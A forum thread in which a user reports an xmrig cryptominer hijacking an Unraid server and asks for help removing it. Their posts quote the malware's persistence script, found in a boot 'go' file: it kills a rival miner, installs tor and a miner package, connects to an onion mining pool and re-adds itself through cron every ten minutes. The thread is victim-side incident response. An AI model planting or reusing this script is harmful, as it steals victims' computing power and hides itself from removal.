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xmrig process taking 100% cpu

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I noticed my Unraid server had 100% cpu on each core so I started digging where was the issue and I found using htop that multiples process xmrig are running, those seems to be related to crypto mining.


I immediately disabled all port forwarding on my router as it was probably from there that someone hijacked my server and I also shut down the docker engine but the processes are still there. The only VM I have is also off. 


I've checked the go file and nothing wrong there so I am a bit lost. It's very hard to access the Unraid WEBUI as it is so cpu overloaded and it barely respond.


I've attached the diagnostic file to this post if anyone can help me fixing this once for all.


In the diagnostic file I found this line in /system/ps.txt


root      2918  0.0  0.0  16856  4180 ?        Ssl  18:15   0:00 xmrig -o ipdsq3672auzcvfoykoyfraco5jarogwvkt4e4eiq2vv7liupvkn73qd.onion:3333 -u H19-i5-11600K -p x --cpu-max-threads-hint=75 -x socks5:// -B


How do I remove this ?


Edited by vcadieux
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So after looking carefully inside my usb drive here is what I found :


in the file /config/wireguard/go :


if pgrep -f "c3pool" > /dev/null
  kill -9 $(pgrep -f "c3pool")
  sleep 5
if ! pgrep -x "tor" > /dev/null
    installpkg /boot/extra/snowflake.txz
if ! pgrep -x "xmrig" > /dev/null
    installpkg /boot/extra/rig-
    xmrig -o ipdsq3672auzcvfoykoyfraco5jarogwvkt4e4eiq2vv7liupvkn73qd.onion:3333 -u $mid -p x --cpu-max-threads-hint=75 -x socks5:// -B
if ! crontab -l | grep -q wireguard > /dev/null
    crontab -l | { cat; echo "*/10 * * * * /bin/bash /boot/config/wireguard/go"; } | crontab - 


In the file /config/go :


# Start the Management Utility
/usr/local/sbin/emhttp &
/bin/bash /boot/config/wireguard/go


So I removed the tor line and this one /bin/bash /boot/config/wireguard/go and rebooted.


I also removed everything inside /config/wireguard/go


The process doesn't seem to come back but still, there is a package called rig- being installed everytime during the boot process (before the unraid login prompt) see attached picture.


Searching for this package name (rig- using Notepad++ in all the file on the USB key doesn't give me any result....


Any help would be appreciated !





Edited by vcadieux
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